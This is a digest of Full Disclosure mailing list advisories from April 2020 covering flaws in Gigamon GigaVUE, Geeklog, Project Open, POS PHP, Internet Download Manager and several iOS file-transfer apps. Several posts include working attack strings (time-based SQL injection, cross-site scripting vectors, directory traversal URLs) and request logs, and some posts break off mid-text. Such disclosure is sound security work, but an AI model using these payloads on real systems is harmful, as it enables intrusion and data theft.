[FD] Exploiting java deserialization vulnerabilities in crypto contexts - a java applet case-study

2020-04-28 Thread RedTimmy Security 
Hi,

regardless of being a deprecated technology, there are still many legacy 
applications relying on java applets out there. A bit of time ago we were 
involved in an atypical web application penetration test.

The difficulty consisted in the fact that the java serialized payload 
responsible for triggerring the vulnerability was located inside the 
authenticated part of a digital certificate, signed client-side with a private 
key stored in a HSM module.

In case you are interested, the full story is here: 
https://www.redtimmy.com/web-application-hacking/how-we-invented-enumjavalibs-while-finding-a-java-deserialization-bug-and-achieving-rce/

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Gigamon - GigaVUE 0day

2020-04-28 Thread Balázs Hambalkó 
Hi,

An issue was discovered in Gigamon GigaVUE 5.5.01.11.
The upload functionality allows an authenticated user to change the
filename value (in the POST method) from the original filename
to achieve directory traversal via a ../ sequence and, for example,
obtain a complete directory listing of the machine.

--

[Additional Information]
This vulnerability aid the attacker in discovering the whole file
system in the underlying host system - including identifying the
writeable and read-only file systems.

The authenticated user needs to use the upload functionality. The POST
HTTP verb is being used which needs to be intercepted, and modified
(the "filename" parameter must be manipulated in the POST body
section)

These vulnerabilities were reported to the vendor. They said this
version will be decommissioned in 2023 and they decided not to provide
technical support anymore. In other words, they will not fix any IT
Security Issues which have lower than critical risk. This
version is in production in enterprise environments, and will be
available until end of 2023, so the impact is real.

--

[Vulnerability Type]
Directory Traversal

--

[Vendor of Product]
Gigamon

--

[Affected Product Code Base]
GigaVUE - 5.5.01.11

--

[Affected Component]
Upload functionality

--

[Attack Type]
Remote

--

[Impact Information Disclosure]
true

--

[Attack Vectors]
The authenticated user needs to use the upload functionality. The POST
HTTP verb is being used which needs to be intercepted, and modified
(the "filename" parameter must be manipulated in the POST body
section)

--

[Reference]https://www.gigamon.com/products/access-traffic/physical-nodes.html

--

[Has vendor confirmed or acknowledged the vulnerability?]
true

--

[Discoverer]
Balazs Hambalko, IT Security Consultant

Use CVE-2020-12251.



An issue was discovered in Gigamon GigaVUE 5.5.01.11. The upload
functionality allows an arbitrary file upload for an authenticated
user. If an executable file is uploaded into the www-root directory,
then it could yield remote code execution via the filename parameter.

--

[Additional Information]
These vulnerabilities were reported to the vendor. They said this
version will be decommissioned in 2023 and they decided not to provide
technical support anymore. In other words, they will not fix any IT
Security Issues which have lower than critical risk. This
version is in production in enterprise environments, and will be
available until end of 2023, so the impact is real.

--

[Vulnerability Type]
Insecure Permissions

--

[Vendor of Product]
Gigamon

--

[Affected Product Code Base]
GigaVUE - 5.5.01.11

--

[Affected Component]
Upload functionality

--

[Attack Type]
Remote

--

[Impact Code execution]
true

--

[Attack Vectors]
The authenticated user needs to use the upload functionality. The POST
HTTP verb is being used which needs to be intercepted, and modified
(the "filename" parameter must be manipulated in the POST body
section)

--

[Reference]https://www.gigamon.com/products/access-traffic/physical-nodes.html

--

[Has vendor confirmed or acknowledged the vulnerability?]
true

--

[Discoverer]
Balazs Hambalko, IT Security Consultant


Use CVE-2020-12252.

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Blind SQL Injection Vulnerability in Geeklog 2.2.1

2020-04-28 Thread Daniel Bishtawi 
Hello,

We are informing you about a Blind SQL Injection Vulnerability in Geeklog
2.2.1.

Information


Advisory by Netsparker
Name: Blind SQL Injection Vulnerability in Geeklog
Affected Software: Geeklog
Affected Versions: 2.2.1
Vendor Homepage: https://www.geeklog.net/
Vulnerability Type: Blind SQL Injection
Severity: Critical
Status: Fixed
CVSS Score (3.0): 8.6 (High)
Netsparker Advisory Reference: NS-20-002

Technical Details


Blind SQL Injection

URL  :
http://sectestapp/geeklog-2.2.1/public_html/comment.php#commenteditform
Parameter Name  : uid
Parameter Type  : POST
Attack Pattern  :
2+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f

For more information:
https://www.netsparker.com/web-applications-advisories/ns-20-002-blind-sql-injection-in-geeklog/


Regards,

[image: upload image]
Daniel Bishtawi | Marketing Administrator
E: dan...@netsparker.com 

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Cross-Site Scripting Vulnerability in Geeklog 2.2.1

2020-04-28 Thread Daniel Bishtawi 
Hello,

We are informing you about a Cross-Site Scripting Vulnerability in Geeklog
2.2.1.

Here are the details:

Information


Advisory by Netsparker
Name: Cross-Site Scripting Vulnerability in Geeklog
Affected Software: Geeklog
Affected Versions: 2.2.1
Vendor Homepage: https://www.geeklog.net/
Vulnerability Type: Cross-Site Scripting
Severity: Important
Status: Fixed
CVSS Score (3.0): 7.4 (High)
Netsparker Advisory Reference: NS-20-001

Technical Details


URL :
http://sectestapp/geeklog-2.2.1/public_html/admin/plugins.php?direction=x
"%20onmouseover=netsparker(0x01AAEC)%20x="=1=pi_load
Parameter Name : direction
Parameter Type : GET
Attack Pattern : x%22+onmouseover%3dnetsparker(0x01AAEC)+x%3d%22

URL :
http://sectestapp/geeklog-2.2.1/public_html/admin/plugins.php?direction=ASC=1=x
"%20onmouseover=netsparker(0x019E05)%20x="
Parameter Name : prevorder
Parameter Type : GET
Attack Pattern : x%22+onmouseover%3dnetsparker(0x019E05)+x%3d%22

For more information:
https://www.netsparker.com/web-applications-advisories/ns-20-001-cross-site-scripting-in-geeklog/


Regards,

[image: upload image]
Daniel Bishtawi | Marketing Administrator
E: dan...@netsparker.com 

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Multiple vulnerabilities OpenAudiT

2020-04-28 Thread Pablo Zurro via Fulldisclosure 
https://www.coresecurity.com/advisories/open-audit-multiple-vulnerabilities

 [cid:image001.png@01D61CA0.B2B50080]
Pablo A. Zurro
Technical Product Manager
e. pablo.zu...@helpsystems.com
p. +34 93 274 0051 Ext. 211
w. www.helpsystems.com/es
[cid:image002.jpg@01D61CA0.B2B50080][cid:image003.jpg@01D61CA0.B2B50080]
 [cid:image004.jpg@01D61CA0.B2B50080] 




___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Project Open v5.0.3 CMS - Multiple Web Vulnerabilities

2020-04-28 Thread Vulnerability Lab 
Document Title:
===
Project Open v5.0.3 CMS - Multiple Web Vulnerabilities


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2225


Release Date:
=
2020-04-25


Vulnerability Laboratory ID (VL-ID):

2225


Common Vulnerability Scoring System:

7.3


Vulnerability Class:

Multiple


Current Estimated Price:

2.000€ - 3.000€


Product & Service Introduction:
===
Join more than 20.000 users and become part of our Community. You will
be able to track your incidents,
create new tickets, add product ideas and track the progress of development.

(Copy of the Homepage:  http://project-open.net/ )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered multiple web
vulnerabilities in the official Project Open v5.0.3 CMS.


Affected Product(s):

Project-Open
Product: Project Open v5.0.3 - CMS (Web-Application)


Vulnerability Disclosure Timeline:
==
2020-04-27: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
High


Authentication Type:

Restricted authentication (user/moderator) - User privileges


User Interaction:
=
No User Interaction


Disclosure Type:

Independent Security Research


Technical Details & Description:

1.1
Multiple remote sql-injection web vulnerabilities has been discovered in
the official  Project Open v5.0.3 CMS web-application.
The vulnerability allows remote attackers to inject or execute own sql
commands to compromise the dbms or file system of the application.

The sql injection vulnerabilities are located in the `order_by`,
`forum_order_by` and `audit_id` parameters of the
`./intranet-expenses/index`
and `./intranet-audit/view` modules. The request method to inject or
execute commands is GET and the attack vector is located on the
application-side.
Attackers with privileged accounts to edit are able to inject own sql
queries via order or id parameter to compromise the dbms. Multiple
unhandled
and broken sql queries are visible as default debug to output for
different roles as well.

Exploitation of the remote sql injection vulnerability requires no user
interaction and a privileged web-application user account.
Successful exploitation of the remote sql injection results in database
management system, web-server and web-application compromise.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] ./intranet-expenses/index
[+] ./intranet-audit/view

Vulnerable Parameter(s):
[+] forum_order_by
[+] order_by
[+] audit_id



1.2
Multiple non-persistent cross site scripting vulnerabilities has been
discovered in the official  Project Open v5.0.3 CMS web-application.
The vulnerability allows remote attackers to inject own malicious script
codes with non-persistent attack vector to compromise browser
to web-application requests from the client-side.

The cross site scripting web security vulnerabilities are located in the
`bread_crum_path` and `re_path` parameters of the
`./intranet/projects/view` and `./intranet-filestorage` modules. The
request method to inject the malicious script code is
GET and the attack vector of the vulnerability is non-persistent on
client-side.

Remote attackers are able to inject own script codes to the client-side
requested vulnerable web-application parameters. The attack vector of
the vulnerability is non-persistent and the request method to
inject/execute is GET. The vulnerabilities are classic client-side cross
site
scripting vulnerabilities. Successful exploitation of the vulnerability
results in session hijacking, non-persistent phishing attacks,
non-persistent external redirects to malicious source and non-persistent
manipulation of affected or connected application modules.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] ./intranet/projects/view
[+] ./intranet-filestorage

Vulnerable Parameter(s):
[+] bread_crum_path
[+] rel_path


Proof of Concept (PoC):
===
1.1
The remote sql-injection web vulnerabilities can be exploited by
authenticated privileged user accounts without user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.


PoC: SQL-Injection
https://po-cms.localhost:80/intranet/?forum_max_entries_per_page=10_order_by='[SQL
INJECTION]--_object_id=0_start_idx=10&
https://po-cms.localhost:80/intranet-expenses/index?end_date=2020-04-25=todo_type_id=_id=29129_date=2000-01-01='[SQL
INJECTION]--

[FD] POS PHP v17.5 - Persistent Cross Site Web Vulnerability

2020-04-28 Thread Vulnerability Lab 
Document Title:
===
POS PHP v17.5 - Persistent Cross Site Web Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2228


Release Date:
=
2020-04-28


Vulnerability Laboratory ID (VL-ID):

2228


Common Vulnerability Scoring System:

4.6


Vulnerability Class:

Cross Site Scripting - Persistent


Current Estimated Price:

1.000€ - 2.000€


Product & Service Introduction:
===
Turn your Retail Small Business into a Customer Focused, Profit
Generating Machine. Guaranteed to save you time,
increase the accuracy of your inventory, and help you make informed
decisions for your business. Types of businesses
that work great with PHP Point of Sale.

(Copy of the Homepage: https://phppointofsale.com/ )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered a persistent
cross site scripting web vulnerability in the POS PHP v17.5 web-application.


Vulnerability Disclosure Timeline:
==
2020-04-28: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Authentication Type:

Restricted authentication (user/moderator) - User privileges


User Interaction:
=
Low User Interaction


Disclosure Type:

Independent Security Research


Technical Details & Description:

A persistent input validation web vulnerability has been discovered in
the official POS PHP v17.5 web-application.
The vulnerability allows remote attackers to inject own malicious script
codes with persistent attack vector to
compromise browser to web-application requests from the application-side.

The persistent web vulnerability is located in the firstname and
lastname parameter of the customer profile module.
Remote attackers are able to change or add malicious script code as
firstname and lastname to customer profiles.
Thus allows to execute the script code with persistent attack vector
against administrators in the backend in the
/customers/ or customers/save/ modules. The request method to inject is
POST via add or edit of the customer and
the attack vector is located on the application-side.

Successful exploitation of the vulnerability results in session
hijacking, persistent phishing attacks, persistent
external redirects to malicious source and persistent manipulation of
affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Customer (index.php/customers/save)

Vulnerable Input(s):
[+] Firstname
[+] Lastname

Vulnerable File(s):
[+]

Vulnerable Parameter(s):
[+] firstname
[+] lastname

Affected Module(s):
[+] index.php/customers/


Proof of Concept (PoC):
===
The persistent input validation web vulnerability can be exploited by
remote attackers with low privilege user account with low user interaction.
For security demonstration or to reproduce the security web
vulnerability follow the provided information and steps below to continue.


Manual steps to reproduce ...
1. Register a customer account
2. Move to the profile section
3. Inject test payload into the vulnerable firstname and lastname input
field
4. Save the entry and wait
Note: The execute occurs in the backend on preview of barcode, customer
details and more
5. Wait until the admin or other high privileged user roles are
interacting for execute
6. Successful reproduce of the persistent web vulnerability!


PoC: Exploitation




PoC: Vulnerable Source
Reports - PHP Point Of Sale, Inc " >"
Report04/25/2019-04/25/2020
 Print 
 Add to
Favorites


--- PoC Session Logs [POST] ---
https://pos-php.localhost:8000/index.php/customers/check_duplicate
Host: pos-php.localhost:8000
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 156
Origin: https://pos-php.localhost:8000
Connection: keep-alive
Referer: https://pos-php.localhost:8000/index.php/customers/view/-1/
Cookie: phppos=c8cophf1djsrvoidg1hm8kmfo770ts3u
name=>" >"=t...@test.de_number=1337
-
POST: HTTP/2.0 200 OK
content-type: text/html; charset=UTF-8
content-length: 19
server: Apache
cache-control: no-store, no-cache, must-revalidate
set-cookie: phppos=c8cophf1djsrvoidg1hm8kmfo770ts3u; path=/; HttpOnly
-
https://pos-php.localhost:8000/index.php/customers/save/
Host: pos-php.localhost:8000
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
boundary=---229089197438477571343458328424
Content-Length: 5237
Origin: https://pos-php.localhost:8000

[FD] Easy Transfer v1.7 iOS - Multiple Web Vulnerabilities

2020-04-28 Thread Vulnerability Lab 
Document Title:
===
Easy Transfer v1.7 iOS - Multiple Web Vulnerabilities


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2223


Release Date:
=
2020-04-27


Vulnerability Laboratory ID (VL-ID):

2223


Common Vulnerability Scoring System:

7.1


Vulnerability Class:

Multiple


Current Estimated Price:

1.000€ - 2.000€


Product & Service Introduction:
===
Transfer files between your iPhone and Computer using your local WiFi
network.

(Copy of the Homepage:
https://apps.apple.com/us/app/easy-transfer-wifi-transfer/id1484667078 )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered multiple web
vulnerabilities in the Easy Transfer Wifi Transfer v1.7 ios mobile
application.


Affected Product(s):

Rubikon Teknoloji
Product: Easy Transfer v1.7 - iOS Mobile Web-Application


Vulnerability Disclosure Timeline:
==
2020-04-27: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
High


Authentication Type:

No authentication (guest)


User Interaction:
=
Low User Interaction


Disclosure Type:

Independent Security Research


Technical Details & Description:

1.1
A directory traversal web vulnerability has been discovered in the Easy
Transfer Wifi Transfer v1.7 ios mobile application.
The vulnerability allows remote attackers to change the application path
in performed requests to compromise the local application
or file-system of a mobile device. Attackers are for example able to
request environment variables or a sensitive system path.

The directory-traversal web vulnerability is located in the main
application path request performed via GET method. Attackers are
able to request for example the local path variables of the web-server
by changing the local path in the performed request itself.
In a first request the attack changes the path, the host redirects to
complete the adress with "..". Then the attacker just
attaches /.. a final slash to its request and the path can be accessed
via web-browser to download or list local files.

Exploitation of the directory traversal web vulnerability requires no
privileged web-application user account or user interaction.
Successful exploitation of the vulnerability results in information
leaking by unauthorized file access and mobile application compromise.


1.2
Multiple persistent cross site scripting vulnerability has been
discovered in the Easy Transfer Wifi Transfer v1.7 ios mobile application.
The vulnerability allows remote attackers to inject own malicious script
codes with persistent attack vector to compromise the mobile
web-application from the application-side.

The persistent vulnerabilities are located in the `Create Folder` and
`Move/Edit` functions. Attackers are able to inject own malicious
script codes to the `oldPath`, `newPath` and `path` parameters. The
request method to inject is POST and the attack vector is located on
the application-side.

Successful exploitation of the vulnerability results in session
hijacking, persistent phishing attacks, persistent external redirects
to malicious source and persistent manipulation of affected application
modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Create Folder
[+] Move/Edit

Vulnerable Parameter(s):
[+] oldPath
[+] newPath
[+] path


Proof of Concept (PoC):
===
1.1
The directory traversal web vulnerability can be exploited by remote
attackers with wifi network access without user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.


PoC: Exploitation
http://localhost/list?path=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F../

[{"path":"/../../../../../../../../../../../../../../../../../../../../../../../../../../../test/","name":"test"}]


--- PoC Session Logs [GET] --- (list)
http://localhost/list?path=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F../
Host: localhost
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
-
GET: HTTP/1.1 200 OK
Content-Length: 213
Content-Type: application/json
Connection: Close


1.2
The persistent input validation web vulnerabilities can be exploited by
remote attackers with wifi network access with low user

[FD] File Explorer v1.4 iOS - Information Disclosure Vulnerability

2020-04-28 Thread Vulnerability Lab 
Document Title:
===
File Explorer v1.4 iOS - Information Disclosure Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2220


Release Date:
=
2020-04-28


Vulnerability Laboratory ID (VL-ID):

2220


Common Vulnerability Scoring System:

7


Vulnerability Class:

Privacy Violation - Information Disclosure


Current Estimated Price:

500€ - 1.000€


Product & Service Introduction:
===
File Explorer is the privacy app to organize and view all your files on
your iPhone or iPad. Always have your important files
with you, protect your privacy perfectly file.

(Copy of the Homepage:
https://apps.apple.com/lu/app/file-explorer-vedio-manager-photo-manager-file-browser/id954838257
)


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered an
information disclosure vulnerability in the File Explorer v1.4 mobile
ios web-application.


Affected Product(s):

Nong Ge
Product: File Explorer v1.4 - iOS Mobile Web-Application


Vulnerability Disclosure Timeline:
==
2020-04-28: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Local


Severity Level:
===
High


Authentication Type:

Pre auth - no privileges


User Interaction:
=
No User Interaction


Disclosure Type:

Independent Security Research


Technical Details & Description:

An information disclosure web vulnerability has been discovered in the
official File Explorer v1.4 mobile ios web-application.

The local file explorer application can be protected with a local pin.
Any time the user opens the app, the pin is required
for the auth to access to private file explorer data. The protection
form is attached to process after the main form with
for example the list in the local application context. Normally the pin
must popup ahead to the local file index but in this
case is processed afterwards. Thus allows a local attacker with physical
ios device access to bypass the security mechanism
to preview files (names, size & co) and access the protected data.

Successful exploitation of the local information disclosure application
vulnerability results in unauthorized data access.


Proof of Concept (PoC):
===
The information disclosure vulnerability can be exploited by local
attackers with physical device access without user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.


Manual steps to reproduce the vulnerability ...
1. Install the local application
2. Open the settings and setup a pin to protect
3. Move to the local web-server via wifi and start it
4. Upload some files for the index dir listing to preview
5. Close the app and open it back by restart
Note: Now the pin should appear
6. Push a folder path or file that becomes visible and hold it
7. Push home again
8. Way free to edit and preview the files
9. Successful reproduce of the local vulnerability!


Security Risk:
==
The security risk of the information disclosure vulnerability in the
web-application is estimated as high.


Credits & Authors:
==
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.

Domains:www.vulnerability-lab.com   www.vuln-lab.com

www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com
paste.vulnerability-db.com  infosec.vulnerability-db.com
Social: twitter.com/vuln_labfacebook.com/VulnerabilityLab   

youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php

[FD] Internet Download Manager v6.37.11.1 - Stack Buffer Overflow Vulnerabilities

2020-04-28 Thread Vulnerability Lab 
Document Title:
===
Internet Download Manager v6.37.11.1 - Stack Buffer Overflow Vulnerabilities


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2236


Release Date:
=
2020-04-28


Vulnerability Laboratory ID (VL-ID):

2236


Common Vulnerability Scoring System:

7.1


Vulnerability Class:

Buffer Overflow


Current Estimated Price:

1.000€ - 2.000€


Product & Service Introduction:
===
Internet Download Manager Corp. is a subsidiary of Tonec Inc. that
develops Internet Applications since 1990.
We have strong expertise in network programming, consulting and design
services. Our company started Internet
Download Manager project in 1998 when we where developing network
libraries and console applications for
accelerated files downloading.

(Copy of the Homepage:
https://www.internetdownloadmanager.com/support/about_us.html )
(Sofwtare Product: https://www.internetdownloadmanager.com/download.html)


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered a stack
buffer overflow vulnerabilities in the Internet Download Manager
v6.37.11.1 software.


Vulnerability Disclosure Timeline:
==
2020-04-28: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Local


Severity Level:
===
High


Authentication Type:

Restricted authentication (user/moderator) - User privileges


User Interaction:
=
No User Interaction


Disclosure Type:

Independent Security Research


Technical Details & Description:

Multiple stack buffer overflow vulnerabilities has been discovered in
the official Internet Download Manager v6.37.11.1 software.
The bufer overflow allows to overwrite registers of the process to
compromise the file-system by elevates local process privileges.

1.1
The first stack buffer overflows is located in the `search` function of
the downloads menu. The search function itself does not use
any secure restriction in the requested search variable of the inputs.
Local attackers with access to the software are able to overflow
the registers to elevate local process privileges. Thus allows a local
attacker to compromise the local computer- or file-system.

1.2
The second stack buffer overflows is located in the `Export/Import`
function of the tasks menu. Local users are able to import and
export the download tasks as *.ef2 file. Local attackers are able to
import manipulated *.ef2 files with manipulated referer and
source url to overwrite the eip register. The issue occurs because of
the insufficient ef2 filetype (context) validation process
that does not perform any length restrictions.

The security risk of the local stack buffer overflow vulnerabilities in
the software are estimated as high with a cvss count of 7.1.
Exploitation of the buffer overflow vulnerability requires a low
privilege or restricted system user account without user interaction.
Successful exploitation of the vulnerability results in overwrite of the
active registers to compromise of the computer system or process.

Vulnerable Module(s):
[+] Search
[+] Import/Export (ef2)


Proof of Concept (PoC):
===
1.1
The stack buffer overflow vulnerability can be exploited by local
attackers with system user privileges without user interaction.
For security demonstration or to reproduce the local vulnerability
follow the provided information and steps below to continue.


Manual steps to reproduce the vulnerability ...
1. Open the software
2. Click the downloads menu and open the search
3. Inject a large unicode payload inside the search input field and transmit
4. The software crashs with several uncaught exception because of
overwritten register (0168D8F0)
5. Successful reproduce of the local buffer overflow vulnerability!


--- Debug Logs (0168D8F0) ---
00d61850 668b08  mov cx,word ptr [eax]ds:002b:41414141
-
00D6186D  |. 56 PUSH ESI ; /Arg1
-
00D61882  |. E8 59FFCALL IDMan.00D617E0  ;
IDMan.00D617E0
-
00D6189B  |> 50 PUSH EAX ; /Arg1
-
00D6189E  |. E8 3DFFCALL IDMan.00D617E0  ;
IDMan.00D617E0
-
Call stack
 Address=0168C79C
 Stack=00DFE0F2
 Procedure / arguments=IDMan.00D617E0
 Called from=IDMan.00DFE0ED
 Frame=0168E02C
-
SEH chain
AddressSE handler
0168C790   IDMan.00F751E8
0168D8F0   41414141
-
EAX 41414141
ECX 0168
EDX 41414141
EBX 0001
ESP 0168C76C
EBP 0168E02C UNICODE "AA..."
ESI 0168C7AC UNICODE "AA..."
EDI

[FD] File Sharing & Chat v1.0 iOS - Denial of Service Vulnerability

2020-04-28 Thread Vulnerability Lab 
Document Title:
===
File Sharing & Chat v1.0 iOS - Denial of Service Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=


Release Date:
=
2020-04-27


Vulnerability Laboratory ID (VL-ID):




Common Vulnerability Scoring System:

4


Vulnerability Class:

Denial of Service


Current Estimated Price:

500€ - 1.000€


Product & Service Introduction:
===
WiFi File Transfer is easiest and quickest file sharing application,
supporting multiple files sharing with multiple devices simultaneously.
WiFi File Transfer Application provides solution for the iPhone users
who want to connect their mobile with PC without connecting a data cable
or wire. WiFi File Sharing App provides the connectivity of mobile
device with PC through Wi-Fi. User can copy, paste, and delete files from
phone by connecting it with Computer. App also supports transfer between
one iPhone to another iPhone.

(Copy of the Homepage:
https://apps.apple.com/us/app/file-sharing-chat-connect-transfer-easy-file-sharing/id1137340773
)


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered a remote
denial of service vulnerability in the


Affected Product(s):

Sandeep Bhandari
File Sharing & Chat v1.0 - Apple iOS Mobile Web Application


Vulnerability Disclosure Timeline:
==
2020-04-27: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Authentication Type:

No authentication (guest)


User Interaction:
=
No User Interaction


Disclosure Type:

Independent Security Research


Technical Details & Description:

A denial of service web vulnerability has been discovered in the
official mobile ios web-application.
The vulnerability allows remote attackers to crash or freeze the
application process or its components.

Attackers are able to transmit special crafted chat messages to trigger
a validation error that is able
to crash the mobile ios application process. The error occurs due to the
transmit of the message body content.
On delivery all connected clients to the chats are crashing at the same
time.


Proof of Concept (PoC):
===
The denial of service vulnerability can be exploited by remote attackers
without user interaction or privileged user accounts.
For security demonstration or to reproduce the web vulnerability follow
the provided information and steps below to continue.


Manual steps to reproduce the vulnerability ...
1. Open the web-application
2. Open the chat module on the buttom of the app index
3. Insert payload and transmit via send to all users
4. All app clients do crash with an uncaught validation exception
5. Successful reproduce of the denial of service vulnerability!


PoC: Exploitation
 


Security Risk:
==
The security risk of the denial of service web vulnerability in the
mobile web-application is estimated as medium.


Credits & Authors:
==
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.

Domains:www.vulnerability-lab.com   www.vuln-lab.com

www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com
paste.vulnerability-db.com  infosec.vulnerability-db.com
Social: twitter.com/vuln_labfacebook.com/VulnerabilityLab   

youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php

[FD] Transfer Master v3.3 iOS - Denial of Service Vulnerability

2020-04-28 Thread Vulnerability Lab 
Document Title:
===
Transfer Master v3.3 iOS - Denial of Service Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2224


Release Date:
=
2020-04-28


Vulnerability Laboratory ID (VL-ID):

2224


Common Vulnerability Scoring System:

4.2


Vulnerability Class:

Denial of Service


Current Estimated Price:

500€ - 1.000€


Product & Service Introduction:
===
Transfer Master - Transfer photo,video,file,contact and File manager.

(Copy of the Homepage:
https://apps.apple.com/us/app/transfer-master-transfer-photo-video-file-contact/id590196698
)


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered a remote
denial of service vulnerability in the Transfer Master v3.3 mobile ios
web-application.


Vulnerability Disclosure Timeline:
==
2020-04-28: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Authentication Type:

Pre auth - no privileges


User Interaction:
=
No User Interaction


Disclosure Type:

Independent Security Research


Technical Details & Description:

A remote denial of service vulnerability has been discovered in the
official Transfer Master v3.3 mobile ios web-application.

The denial of service vulnerability is located in the delete post method
request on the files path. Remote attackers can
manipulate the ui by sending special crafted requests to cause a null
pointer error that crashs the wifi web-server.
The attacker changes the file delete request to a null path which
results in a null pointer that crashs the application.

Successful exploitation of the denial of service vulnerability results
in a wifi web-server ui crash and freeze.


Proof of Concept (PoC):
===
The denial of service vulnerability can be exploited by remote attackers
with wifi network access without user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.


Manual steps to reproduce the vulnerability ...
1. Install and start the local ios app
2. Open the wifi share option to start the web-server
3. Move to the front ui
4. Tamper the https session and reply by deleting the files path with
(null) as empty quote
5. The web-server crashs and the wifi ui becomes unavailable by a blank
screen that responds with not found
Note: Service still alive but finally unavailable cause of a null
pointer issue
6. Successful reproduce of the denial of service vulnerability!


--- PoC Session Logs (POST/GET) ---
http://localhost:8181/files//(null)
Host: localhost:8181
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
